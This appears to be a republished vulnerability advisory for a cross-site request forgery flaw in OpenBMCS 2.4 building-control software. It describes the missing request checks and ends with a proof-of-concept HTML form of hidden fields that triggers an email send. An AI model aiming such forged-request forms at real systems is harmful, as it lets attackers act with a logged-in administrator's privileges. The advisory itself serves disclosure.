OpenBMCS 2.4 Cross Site Request Forgery

OpenBMCS version 2.4 suffers from a cross site request forgery vulnerability.

MD5 | 84ffa1edfe22771f2bb7cb564470dfd0

OpenBMCS 2.4 CSRF Send E-mail

Product web page:
Affected version: 2.4

Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
Apache/2.4.41 (Ubuntu)
Apache/2.4.25 (Debian)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2022-5691
Advisory URL:



<form action="" method="POST">
<input type="hidden" name="subject" value="FEEDBACK%20TESTINGUS" />
<input type="hidden" name="message" value="Take me to your leader." />
<input type="hidden" name="email" value="[email protected]" />
<input type="submit" value="Send" />

Related Posts